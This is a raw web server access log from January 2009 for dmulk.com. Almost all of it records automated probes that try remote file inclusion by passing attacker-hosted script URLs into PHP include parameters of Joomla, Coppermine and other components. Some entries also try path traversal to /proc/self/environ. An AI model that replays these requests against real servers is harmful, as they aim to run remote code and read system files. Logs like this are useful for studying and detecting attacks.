119.235.18.7 - - [06/Jan/2009:09:07:20 -0800] "GET /logs/access_081024.log/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:07:21 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:07:21 -0800] "GET /logs/access_071103.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:07:21 -0800] "GET /logs/access_071125.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:07:26 -0800] "GET /logs/access_081015.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:07:28 -0800] "GET /index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:07:29 -0800] "GET /logs/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:07:32 -0800] "GET /logs/access_081005.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:07:44 -0800] "GET /logs/access_080808.log//bemarket/postscript/postscript.php?p_mode=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:09:08:00 -0800] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0082.jpg HTTP/1.1" 200 7512 "-" "Googlebot-Image/1.0" "dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:08:10 -0800] "GET /logs/access_071222.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:08:11 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:08:11 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:08:12 -0800] "GET /logs/access_080311.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:26 -0800] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:26 -0800] "GET /crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:26 -0800] "GET /logs/access_081018.log//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:26 -0800] "GET /logs/access_080226.log//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
202.58.16.16 - - [06/Jan/2009:09:08:31 -0800] "GET /modules/My_eGallery/index.php?basepath=http://fwt.txdnl.com/4-10/r/o/robi22//t.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.58.16.16 - - [06/Jan/2009:09:08:31 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://fwt.txdnl.com/4-10/r/o/robi22//t.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:34 -0800] "GET /crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:34 -0800] "GET /logs/access_080226.log//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:34 -0800] "GET /logs/access_081018.log//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:34 -0800] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:36 -0800] "GET /logs/access_080226.log//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:36 -0800] "GET /crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:36 -0800] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:08:36 -0800] "GET /logs/access_081018.log//crontab/run_billing.php?config[include_dir]=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:08:47 -0800] "GET /logs/access_081015.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:08:47 -0800] "GET /index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:08:47 -0800] "GET /logs/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:08:47 -0800] "GET /logs/access_081005.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:08:51 -0800] "GET /logs/access_081015.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:08:51 -0800] "GET /index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:08:51 -0800] "GET /logs/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:10 -0800] "GET /logs/access_081005.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:09:11 -0800] "GET /logs/access_080410.log/index1.php?id=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:09:11 -0800] "GET /index1.php?id=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:09:11 -0800] "GET /logs/index1.php?id=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:23 -0800] "GET /logs/access_080401.log/index.php?Load=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:25 -0800] "GET /logs/index.php?Load=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:26 -0800] "GET /index.php?Load=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 200 94661 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:30 -0800] "GET /logs/access_080504.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:35 -0800] "GET /logs/access.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:09:40 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:09:40 -0800] "GET /logs/access_080927.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:09:40 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:41 -0800] "GET /print.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:42 -0800] "GET /logs/access_080804.log/print.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:42 -0800] "GET /logs/print.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:44 -0800] "GET /logs/access_080401.log/index.php?Load=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:46 -0800] "GET /logs/index.php?Load=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:47 -0800] "GET /index.php?Load=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 200 94661 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
202.60.67.10 - - [06/Jan/2009:09:09:48 -0800] "GET /logs/access_080504.log%20%20//?path[docroot]=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.67.10 - - [06/Jan/2009:09:09:48 -0800] "GET /logs/access_080630.log%20%20//?path[docroot]=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:52 -0800] "GET /print.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:55 -0800] "GET /logs/print.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:09:56 -0800] "GET /logs/access_080826.log/index1.php?id=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:09:57 -0800] "GET /logs/access_080804.log/print.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:10:08 -0800] "GET /logs/access_080119.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:10:09 -0800] "GET /logs/access_081015.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.186.110.226 - - [06/Jan/2009:09:10:16 -0800] "GET /logs/access_081022.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/COPYING.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:10:19 -0800] "GET /logs/access_080207.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:10:22 -0800] "GET /logs/access_080828.log/index.php?Load=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:09:10:37 -0800] "GET /logs/access_081114.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:09:10:40 -0800] "GET /logs/access_080123.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:09:10:40 -0800] "GET /logs/access_080126.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:09:10:42 -0800] "GET /ashnews.php?pathtoashnews=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:10:47 -0800] "GET /logs/access_080828.log/index.php?Load=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:09:10:51 -0800] "GET /logs//ashnews.php?pathtoashnews=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:09:10:51 -0800] "GET /logs/access_080813.log%20%20//ashnews.php?pathtoashnews=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:11:09 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:11:09 -0800] "GET /logs/access_080927.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:11:10 -0800] "GET /logs/access_081015.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:11:10 -0800] "GET /?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 200 94679 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:11:12 -0800] "GET /logs//?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 200 81177 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:11:16 -0800] "GET /logs/access_080602.log/print.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:09:11:18 -0800] "GET /logs/access_081114.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:11:23 -0800] "GET /logs/access_080125.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:09:11:43 -0800] "GET /logs/access_080518.log%20%20//ashnews.php?pathtoashnews=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:11:46 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:11:55 -0800] "GET /logs/access_080602.log/print.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:12:17 -0800] "GET /logs/access_080119.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:12:17 -0800] "GET /logs/access.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:12:22 -0800] "GET /logs/access_080504.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:12:56 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.com/epang_irfan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:12:58 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:09:12:58 -0800] "GET /logs/access_081114.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:00 -0800] "GET /logs/access_080804.log/print.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:00 -0800] "GET /print.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:00 -0800] "GET /logs/print.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.140.23.185 - - [06/Jan/2009:09:13:10 -0800] "GET /%20/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
62.140.23.185 - - [06/Jan/2009:09:13:10 -0800] "GET /logs/%20/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
62.140.23.185 - - [06/Jan/2009:09:13:10 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.140.23.185 - - [06/Jan/2009:09:13:10 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.140.23.185 - - [06/Jan/2009:09:13:10 -0800] "GET /logs/%20/components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.140.23.185 - - [06/Jan/2009:09:13:10 -0800] "GET /%20/components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.140.23.185 - - [06/Jan/2009:09:13:11 -0800] "GET /logs/%20/components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.140.23.185 - - [06/Jan/2009:09:13:11 -0800] "GET /%20/components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:27 -0800] "GET /logs/access.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:13:30 -0800] "GET /logs/access_081212.log//?_zb_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:13:30 -0800] "GET /logs//?_zb_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:13:31 -0800] "GET /?_zb_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 200 94687 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:31 -0800] "GET /logs/access_080119.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.198.133.72 - - [06/Jan/2009:09:13:34 -0800] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/lofiversion/index.php/t36984.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
